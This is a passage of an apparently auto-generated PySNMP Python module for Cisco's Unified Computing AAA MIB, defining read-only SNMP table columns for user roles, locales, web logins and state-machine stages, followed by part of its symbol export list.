if mibBuilder.loadTexts: cucsAaaUserEpFsmDescrData.setStatus('current')
cucsAaaUserEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmFsmStatus.setStatus('current')
cucsAaaUserEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmProgress.setStatus('current')
cucsAaaUserEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtErrCode.setStatus('current')
cucsAaaUserEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtErrDescr.setStatus('current')
cucsAaaUserEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtRslt.setStatus('current')
cucsAaaUserEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54), )
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageTable.setStatus('current')
cucsAaaUserEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageEntry.setStatus('current')
cucsAaaUserEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageInstanceId.setStatus('current')
cucsAaaUserEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageDn.setStatus('current')
cucsAaaUserEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageRn.setStatus('current')
cucsAaaUserEpFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageDescrData.setStatus('current')
cucsAaaUserEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaUserEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 6), CucsAaaUserEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageName.setStatus('current')
cucsAaaUserEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageOrder.setStatus('current')
cucsAaaUserEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageRetry.setStatus('current')
cucsAaaUserEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageStageStatus.setStatus('current')
cucsAaaUserEpFsmTaskTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34), )
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskTable.setStatus('current')
cucsAaaUserEpFsmTaskEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserEpFsmTaskInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskEntry.setStatus('current')
cucsAaaUserEpFsmTaskInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskInstanceId.setStatus('current')
cucsAaaUserEpFsmTaskDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskDn.setStatus('current')
cucsAaaUserEpFsmTaskRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskRn.setStatus('current')
cucsAaaUserEpFsmTaskCompletion = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 4), CucsFsmCompletion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskCompletion.setStatus('current')
cucsAaaUserEpFsmTaskFlags = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 5), CucsFsmFlags()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskFlags.setStatus('current')
cucsAaaUserEpFsmTaskItem = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 6), CucsAaaUserEpFsmTaskItem()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskItem.setStatus('current')
cucsAaaUserEpFsmTaskSeqId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskSeqId.setStatus('current')
cucsAaaUserLocaleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35), )
if mibBuilder.loadTexts: cucsAaaUserLocaleTable.setStatus('current')
cucsAaaUserLocaleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserLocaleInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserLocaleEntry.setStatus('current')
cucsAaaUserLocaleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserLocaleInstanceId.setStatus('current')
cucsAaaUserLocaleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleDn.setStatus('current')
cucsAaaUserLocaleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleRn.setStatus('current')
cucsAaaUserLocaleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleDescr.setStatus('current')
cucsAaaUserLocaleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleName.setStatus('current')
cucsAaaUserLocaleConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 7), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleConfigState.setStatus('current')
cucsAaaUserLocaleConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleConfigStatusMessage.setStatus('current')
cucsAaaUserRoleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36), )
if mibBuilder.loadTexts: cucsAaaUserRoleTable.setStatus('current')
cucsAaaUserRoleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserRoleInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserRoleEntry.setStatus('current')
cucsAaaUserRoleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserRoleInstanceId.setStatus('current')
cucsAaaUserRoleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleDn.setStatus('current')
cucsAaaUserRoleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleRn.setStatus('current')
cucsAaaUserRoleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleDescr.setStatus('current')
cucsAaaUserRoleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleName.setStatus('current')
cucsAaaUserRoleConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 7), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleConfigState.setStatus('current')
cucsAaaUserRoleConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleConfigStatusMessage.setStatus('current')
cucsAaaWebLoginTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37), )
if mibBuilder.loadTexts: cucsAaaWebLoginTable.setStatus('current')
cucsAaaWebLoginEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaWebLoginInstanceId"))
if mibBuilder.loadTexts: cucsAaaWebLoginEntry.setStatus('current')
cucsAaaWebLoginInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaWebLoginInstanceId.setStatus('current')
cucsAaaWebLoginDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginDn.setStatus('current')
cucsAaaWebLoginRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginRn.setStatus('current')
cucsAaaWebLoginDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginDescr.setStatus('current')
cucsAaaWebLoginId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginId.setStatus('current')
cucsAaaWebLoginIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginIntId.setStatus('current')
cucsAaaWebLoginLocalHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginLocalHost.setStatus('current')
cucsAaaWebLoginName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginName.setStatus('current')
cucsAaaWebLoginRemoteHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginRemoteHost.setStatus('current')
cucsAaaWebLoginSession = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 10), CucsAaaSession()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginSession.setStatus('current')
cucsAaaWebLoginSwitchId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 11), CucsNetworkSwitchId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginSwitchId.setStatus('current')
cucsAaaWebLoginPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginPolicyLevel.setStatus('current')
cucsAaaWebLoginPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 13), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginPolicyOwner.setStatus('current')
mibBuilder.exportSymbols("CISCO-UNIFIED-COMPUTING-AAA-MIB", cucsAaaPwdProfileDescr=cucsAaaPwdProfileDescr, cucsAaaRadiusProviderOrder=cucsAaaRadiusProviderOrder, cucsAaaExtMgmtCutThruTknEntry=cucsAaaExtMgmtCutThruTknEntry, cucsAaaDefaultAuthRefreshPeriod=cucsAaaDefaultAuthRefreshPeriod, cucsAaaRoleDn=cucsAaaRoleDn, cucsAaaLdapProviderEnableSSL=cucsAaaLdapProviderEnableSSL, cucsAaaRealmFsmRmtErrCode=cucsAaaRealmFsmRmtErrCode, cucsAaaUserEpFsmProgr=cucsAaaUserEpFsmProgr, cucsAaaLogRn=cucsAaaLogRn, cucsAaaUserEpFsmRmtInvErrDescr=cucsAaaUserEpFsmRmtInvErrDescr, cucsAaaEpLoginIntId=cucsAaaEpLoginIntId, cucsAaaLdapEpFsmDescr=cucsAaaLdapEpFsmDescr, cucsAaaConsoleAuthName=cucsAaaConsoleAuthName, cucsAaaLdapProviderEntry=cucsAaaLdapProviderEntry, cucsAaaDomainSessionTimeout=cucsAaaDomainSessionTimeout, cucsAaaUserEpFsmFsmStatus=cucsAaaUserEpFsmFsmStatus, cucsAaaRadiusProviderTimeout=cucsAaaRadiusProviderTimeout, cucsAaaCimcSessionInstanceId=cucsAaaCimcSessionInstanceId, cucsAaaTacacsPlusProviderTimeout=cucsAaaTacacsPlusProviderTimeout, cucsAaaConsoleAuthDn=cucsAaaConsoleAuthDn, cucsAaaDomainAuthTable=cucsAaaDomainAuthTable, cucsAaaUserExpires=cucsAaaUserExpires, cucsAaaSessionRefreshPeriod=cucsAaaSessionRefreshPeriod, cucsAaaAuthRealmDn=cucsAaaAuthRealmDn, cucsAaaLdapEpFsmInstanceId=cucsAaaLdapEpFsmInstanceId, cucsAaaProviderGroupConfigState=cucsAaaProviderGroupConfigState, cucsAaaEpFsmTaskDn=cucsAaaEpFsmTaskDn, cucsAaaDomainDescr=cucsAaaDomainDescr, cucsAaaOrgEntry=cucsAaaOrgEntry, cucsAaaRadiusEpFsmStageEntry=cucsAaaRadiusEpFsmStageEntry, cucsAaaRolePriv=cucsAaaRolePriv, cucsAaaSessionInfoTableDn=cucsAaaSessionInfoTableDn, cucsAaaLdapEpFsmTry=cucsAaaLdapEpFsmTry, cucsAaaDefaultAuthDn=cucsAaaDefaultAuthDn, cucsAaaEpUserPwd=cucsAaaEpUserPwd, cucsAaaUserExpiration=cucsAaaUserExpiration, cucsAaaRadiusEpTable=cucsAaaRadiusEpTable, cucsAaaLdapEpFilter=cucsAaaLdapEpFilter, cucsAaaRemoteUserName=cucsAaaRemoteUserName, cucsAaaRoleDescr=cucsAaaRoleDescr, cucsAaaEpAuthProfileIntId=cucsAaaEpAuthProfileIntId, cucsAaaModLRId=cucsAaaModLRId, cucsAaaAuthRealmFsmFsmStatus=cucsAaaAuthRealmFsmFsmStatus, cucsAaaProviderRefName=cucsAaaProviderRefName, cucsAaaLdapEpFsmProgress=cucsAaaLdapEpFsmProgress, cucsAaaOrgDescr=cucsAaaOrgDescr, cucsAaaSessionInfoDn=cucsAaaSessionInfoDn, cucsAaaTacacsPlusEpFsmStageLastUpdateTime=cucsAaaTacacsPlusEpFsmStageLastUpdateTime, cucsAaaRadiusProviderDescr=cucsAaaRadiusProviderDescr, cucsAaaLocaleDescr=cucsAaaLocaleDescr, cucsAaaUserEpFsmTaskCompletion=cucsAaaUserEpFsmTaskCompletion, cucsAaaAuthRealmTable=cucsAaaAuthRealmTable, cucsAaaLdapEpFsmStageName=cucsAaaLdapEpFsmStageName, cucsAaaDomainDn=cucsAaaDomainDn, cucsAaaConsoleAuthEntry=cucsAaaConsoleAuthEntry, cucsAaaRealmFsmTaskEntry=cucsAaaRealmFsmTaskEntry, cucsAaaEpFsmTable=cucsAaaEpFsmTable, cucsAaaModLRTxId=cucsAaaModLRTxId, cucsAaaPwdProfilePolicyLevel=cucsAaaPwdProfilePolicyLevel, cucsAaaLocalePolicyOwner=cucsAaaLocalePolicyOwner, cucsAaaUserEpPwdStrengthCheck=cucsAaaUserEpPwdStrengthCheck, cucsAaaExtMgmtCutThruTknPriv=cucsAaaExtMgmtCutThruTknPriv, cucsAaaExtMgmtCutThruTknInstanceId=cucsAaaExtMgmtCutThruTknInstanceId, cucsAaaShellLoginSession=cucsAaaShellLoginSession, cucsAaaWebLoginDescr=cucsAaaWebLoginDescr, cucsAaaTacacsPlusEpFsmCompletionTime=cucsAaaTacacsPlusEpFsmCompletionTime, cucsAaaCimcSessionEntry=cucsAaaCimcSessionEntry, cucsAaaShellLoginTable=cucsAaaShellLoginTable, cucsAaaLdapEpFsmStageDescrData=cucsAaaLdapEpFsmStageDescrData, cucsAaaTacacsPlusEpFsmProgress=cucsAaaTacacsPlusEpFsmProgress, cucsAaaLdapEpFsmDescrData=cucsAaaLdapEpFsmDescrData, cucsAaaModLRRn=cucsAaaModLRRn, cucsAaaModLRSessionId=cucsAaaModLRSessionId, cucsAaaRadiusProviderName=cucsAaaRadiusProviderName, cucsAaaUserFirstName=cucsAaaUserFirstName, cucsAaaUserDataEntry=cucsAaaUserDataEntry, cucsAaaUserDataIntId=cucsAaaUserDataIntId, cucsAaaEpFsmInstanceId=cucsAaaEpFsmInstanceId, cucsAaaDomainAuthDn=cucsAaaDomainAuthDn, cucsAaaEpUserInstanceId=cucsAaaEpUserInstanceId, cucsAaaLdapProviderRootdn=cucsAaaLdapProviderRootdn, cucsAaaCimcSessionTable=cucsAaaCimcSessionTable, cucsAaaLdapEpFsmDn=cucsAaaLdapEpFsmDn, cucsAaaDefaultAuthSessionTimeout=cucsAaaDefaultAuthSessionTimeout, cucsAaaLdapEpFsmStageDescr=cucsAaaLdapEpFsmStageDescr, cucsAaaAuthRealmFsmProgress=cucsAaaAuthRealmFsmProgress, cucsAaaExtMgmtCutThruTknAuthDomain=cucsAaaExtMgmtCutThruTknAuthDomain, cucsAaaExtMgmtCutThruTknLocales=cucsAaaExtMgmtCutThruTknLocales, cucsAaaModLRCause=cucsAaaModLRCause, cucsAaaSessionRn=cucsAaaSessionRn, cucsAaaUserPwdLifeTime=cucsAaaUserPwdLifeTime, cucsAaaUserEpFsmRmtInvRslt=cucsAaaUserEpFsmRmtInvRslt, cucsAaaSessionLRAffected=cucsAaaSessionLRAffected, cucsAaaUserLastName=cucsAaaUserLastName, cucsAaaRemoteUserPwdSet=cucsAaaRemoteUserPwdSet, cucsAaaLdapProviderAttribute=cucsAaaLdapProviderAttribute, cucsAaaExtMgmtCutThruTknPnDn=cucsAaaExtMgmtCutThruTknPnDn, cucsAaaSessionLRId=cucsAaaSessionLRId, cucsAaaTacacsPlusProviderEntry=cucsAaaTacacsPlusProviderEntry, cucsAaaUserEntry=cucsAaaUserEntry, cucsAaaRadiusEpFsmStageInstanceId=cucsAaaRadiusEpFsmStageInstanceId, cucsAaaRadiusEpFsmStageDescrData=cucsAaaRadiusEpFsmStageDescrData, cucsAaaPreLoginBannerIntId=cucsAaaPreLoginBannerIntId, cucsAaaWebLoginPolicyOwner=cucsAaaWebLoginPolicyOwner, cucsAaaProviderRefDn=cucsAaaProviderRefDn, cucsAaaEpAuthProfileEntry=cucsAaaEpAuthProfileEntry, cucsAaaRealmFsmTaskInstanceId=cucsAaaRealmFsmTaskInstanceId, cucsAaaTacacsPlusEpTable=cucsAaaTacacsPlusEpTable, cucsAaaAuthRealmName=cucsAaaAuthRealmName, cucsAaaLdapEpFsmStageStageStatus=cucsAaaLdapEpFsmStageStageStatus, cucsAaaRadiusEpFsmEntry=cucsAaaRadiusEpFsmEntry, cucsAaaRealmFsmStageRn=cucsAaaRealmFsmStageRn, cucsAaaAuthRealmFsmRmtInvErrCode=cucsAaaAuthRealmFsmRmtInvErrCode, cucsAaaLdapProviderRn=cucsAaaLdapProviderRn, cucsAaaRemoteUserDescr=cucsAaaRemoteUserDescr, cucsAaaUserTable=cucsAaaUserTable, cucsAaaEpUserIsPwdEnc=cucsAaaEpUserIsPwdEnc, cucsAaaRealmFsmTaskCompletion=cucsAaaRealmFsmTaskCompletion, cucsAaaUserDataInstanceId=cucsAaaUserDataInstanceId, cucsAaaProviderRefTable=cucsAaaProviderRefTable, cucsAaaPwdProfileRn=cucsAaaPwdProfileRn, cucsAaaUserRoleRn=cucsAaaUserRoleRn, cucsAaaCimcSessionIsDelete=cucsAaaCimcSessionIsDelete, cucsAaaTacacsPlusEpFsmRmtErrCode=cucsAaaTacacsPlusEpFsmRmtErrCode, cucsAaaLdapEpIntId=cucsAaaLdapEpIntId, cucsAaaEpAuthProfileInstanceId=cucsAaaEpAuthProfileInstanceId, cucsAaaExtMgmtCutThruTknAuthUser=cucsAaaExtMgmtCutThruTknAuthUser, cucsAaaUserEpFsmStageStageStatus=cucsAaaUserEpFsmStageStageStatus, cucsAaaPwdProfileIntId=cucsAaaPwdProfileIntId, cucsAaaUserEpFsmInstanceId=cucsAaaUserEpFsmInstanceId, cucsAaaCimcSessionUser=cucsAaaCimcSessionUser, cucsAaaExtMgmtCutThruTknDescr=cucsAaaExtMgmtCutThruTknDescr, cucsAaaEpFsmCompletionTime=cucsAaaEpFsmCompletionTime, cucsAaaUserRoleConfigStatusMessage=cucsAaaUserRoleConfigStatusMessage, cucsAaaSessionInfoTableInstanceId=cucsAaaSessionInfoTableInstanceId, cucsAaaRadiusEpFsmStatus=cucsAaaRadiusEpFsmStatus, cucsAaaModLRUser=cucsAaaModLRUser, cucsAaaSshAuthData=cucsAaaSshAuthData, cucsAaaUserEpFsmRmtErrDescr=cucsAaaUserEpFsmRmtErrDescr, cucsAaaRadiusEpFsmRmtErrCode=cucsAaaRadiusEpFsmRmtErrCode, cucsAaaAuthRealmFsmStageDescr=cucsAaaAuthRealmFsmStageDescr, cucsAaaCimcSessionLoginTime=cucsAaaCimcSessionLoginTime, cucsAaaRoleName=cucsAaaRoleName, cucsAaaTacacsPlusProviderName=cucsAaaTacacsPlusProviderName, cucsAaaSessionLRUser=cucsAaaSessionLRUser, cucsAaaLdapGroupDn=cucsAaaLdapGroupDn, cucsAaaRemoteUserDn=cucsAaaRemoteUserDn, cucsAaaEpFsmRn=cucsAaaEpFsmRn, cucsAaaRadiusEpDescr=cucsAaaRadiusEpDescr, cucsAaaEpLoginRemoteHost=cucsAaaEpLoginRemoteHost, cucsAaaAuthRealmPolicyOwner=cucsAaaAuthRealmPolicyOwner, cucsAaaDomainConfigState=cucsAaaDomainConfigState, cucsAaaTacacsPlusEpFsmEntry=cucsAaaTacacsPlusEpFsmEntry, cucsAaaPreLoginBannerEntry=cucsAaaPreLoginBannerEntry, cucsAaaUserEpFsmStageInstanceId=cucsAaaUserEpFsmStageInstanceId, cucsAaaExtMgmtCutThruTknIntId=cucsAaaExtMgmtCutThruTknIntId, cucsAaaDomainAuthRn=cucsAaaDomainAuthRn, cucsAaaShellLoginPolicyLevel=cucsAaaShellLoginPolicyLevel, cucsAaaLdapProviderEncKey=cucsAaaLdapProviderEncKey, cucsAaaRealmFsmStageRetry=cucsAaaRealmFsmStageRetry, cucsAaaLdapEpName=cucsAaaLdapEpName, cucsAaaTacacsPlusEpInstanceId=cucsAaaTacacsPlusEpInstanceId, cucsAaaRealmFsmDn=cucsAaaRealmFsmDn, cucsAaaConsoleAuthDescr=cucsAaaConsoleAuthDescr, cucsAaaExtMgmtCutThruTknRemote=cucsAaaExtMgmtCutThruTknRemote, cucsAaaLdapEpFsmStamp=cucsAaaLdapEpFsmStamp, cucsAaaOrgTable=cucsAaaOrgTable, cucsAaaAuthRealmPolicyLevel=cucsAaaAuthRealmPolicyLevel, cucsAaaUserEmail=cucsAaaUserEmail, cucsAaaRadiusEpFsmStageLastUpdateTime=cucsAaaRadiusEpFsmStageLastUpdateTime, cucsAaaSessionInfoTableRn=cucsAaaSessionInfoTableRn, cucsAaaUserDataName=cucsAaaUserDataName, cucsAaaEpLoginId=cucsAaaEpLoginId, cucsAaaLdapProviderName=cucsAaaLdapProviderName, cucsAaaUserEpFsmStageRetry=cucsAaaUserEpFsmStageRetry, cucsAaaEpFsmTaskInstanceId=cucsAaaEpFsmTaskInstanceId, cucsAaaTacacsPlusProviderRetries=cucsAaaTacacsPlusProviderRetries, cucsAaaUserEpPolicyLevel=cucsAaaUserEpPolicyLevel, cucsAaaTacacsPlusEpDn=cucsAaaTacacsPlusEpDn, cucsAaaLdapEpFsmProgr=cucsAaaLdapEpFsmProgr, cucsAaaSessionLoginTime=cucsAaaSessionLoginTime, cucsAaaShellLoginSwitchId=cucsAaaShellLoginSwitchId, cucsAaaDomainName=cucsAaaDomainName, cucsAaaLdapProviderRetries=cucsAaaLdapProviderRetries, cucsAaaLocaleConfigState=cucsAaaLocaleConfigState, cucsAaaTacacsPlusProviderPort=cucsAaaTacacsPlusProviderPort, cucsAaaSessionLRSeverity=cucsAaaSessionLRSeverity, PYSNMP_MODULE_ID=cucsAaaObjects, cucsAaaCimcSessionLastUpdatedTime=cucsAaaCimcSessionLastUpdatedTime, cucsAaaPwdProfileNoChangeInterval=cucsAaaPwdProfileNoChangeInterval, cucsAaaModLRAffected=cucsAaaModLRAffected, cucsAaaTacacsPlusEpIntId=cucsAaaTacacsPlusEpIntId, cucsAaaTacacsPlusEpFsmRmtRslt=cucsAaaTacacsPlusEpFsmRmtRslt, cucsAaaDomainConfigStatusMessage=cucsAaaDomainConfigStatusMessage, cucsAaaLdapEpFsmRmtErrCode=cucsAaaLdapEpFsmRmtErrCode, cucsAaaLocaleTable=cucsAaaLocaleTable, cucsAaaAuthRealmFsmStageInstanceId=cucsAaaAuthRealmFsmStageInstanceId, cucsAaaLdapEpFsmStageOrder=cucsAaaLdapEpFsmStageOrder, cucsAaaUserEpFsmStageOrder=cucsAaaUserEpFsmStageOrder, cucsAaaLdapGroupRuleEntry=cucsAaaLdapGroupRuleEntry, cucsAaaTacacsPlusEpFsmDescr=cucsAaaTacacsPlusEpFsmDescr, cucsAaaProviderGroupDn=cucsAaaProviderGroupDn, cucsAaaRoleTable=cucsAaaRoleTable, cucsAaaUserEpFsmStamp=cucsAaaUserEpFsmStamp, cucsAaaPwdProfileHistoryCount=cucsAaaPwdProfileHistoryCount, cucsAaaAuthRealmFsmDescr=cucsAaaAuthRealmFsmDescr, cucsAaaUserEpFsmStageTable=cucsAaaUserEpFsmStageTable, cucsAaaTacacsPlusEpRn=cucsAaaTacacsPlusEpRn, cucsAaaLdapProviderInstanceId=cucsAaaLdapProviderInstanceId, cucsAaaDomainAuthRealm=cucsAaaDomainAuthRealm, cucsAaaDomainRn=cucsAaaDomainRn, cucsAaaSessionId=cucsAaaSessionId, cucsAaaLdapProviderDescr=cucsAaaLdapProviderDescr, cucsAaaRadiusProviderService=cucsAaaRadiusProviderService, 